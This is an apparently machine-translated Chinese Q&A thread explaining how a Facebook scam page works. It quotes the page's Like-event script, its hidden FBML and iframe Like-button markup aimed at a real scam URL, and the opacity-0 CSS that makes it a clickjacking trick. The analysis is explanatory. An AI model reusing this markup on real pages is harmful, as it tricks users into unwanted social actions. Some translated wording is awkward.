這個FB惡意軟件如何工作？

警告：此鏈接是NSFW（它是色情片）。這個FB惡意軟件如何工作？

1truc2dingue.com/3-une-br%C3%A9silienne-enleve-le-bas.html

這走到今天四周，FB上的一個熱門的朋友點擊它。我知道這是惡意軟件，他是一名程序員，所以我開始努力弄清楚它是如何欺騙他的。

這是我找到的。在頁面的開頭你會發現這個：

<script type="text/javascript"> 
<!-- 
window.fbAsyncInit = function() 
{ 
FB.init({appId: '135200846551763', status: true, cookie: true, xfbml: true}); 
FB.Event.subscribe('edge.create', function(href, widget) { 
    document.getElementById("video").style.display= 'block'; 
    document.getElementById("preview").style.display= 'none'; 
}); 
}; 
//--> 
</script>

沒有太隱祕的地方。當頁面被喜歡（事件愚蠢地稱爲"edge.create"）預覽消失，並且視頻（初始化爲顯示：無顯示）。

那麼當沒有明顯的「喜歡！按鈕。這是腳本背後的訣竅。我可以看到腳本使用過時FBML，

<fb:like id=f2 class=iframe href="http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html" layout="button_count" show_faces="false" width="480" style="margin-top:65px;margin-left:110px;"></fb:like>

而且，現代的iFrame API，

<iframe id=f1 class=iframe src="http://www.facebook.com/plugins/like.php?href=http://1truc2dingue.com/3-une-brésilienne-enleve-le-bas.html&amp;layout=button_count&amp;show_faces=false&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>

來源

2012-08-27 Evan Carroll

正確的詞：*** NSFW *** –

如果你是n在工作中，但你仍然不想查看它？我不同意你的修改。 –

我沒有編輯它。 –

這就是所謂的ClickJacking

您只需點擊看不見的「喜歡」按鈕（.iframe類）

.iframe { 
    opacity: 0; 
    filter: alpha(opacity=0); 
}

來源

2012-08-27 03:18:20

我明白了！ '.iframe {opacity：0; filter：alpha（opacity = 0）}'在底部。我認爲這是比某種更深的巫術......這是合法的嗎？ Facebook會禁止網站使用這種方法？ –

@Cole對於捷克的鏈接抱歉，我沒有注意到它，並感謝糾正我！ :) –

@Evan我會說這不是非法的，但至少不允許從Facebook。 Facebook肯定會禁止這些網站，如果有人注意到它。 –

這個FB惡意軟件如何工作？

回答

相關問題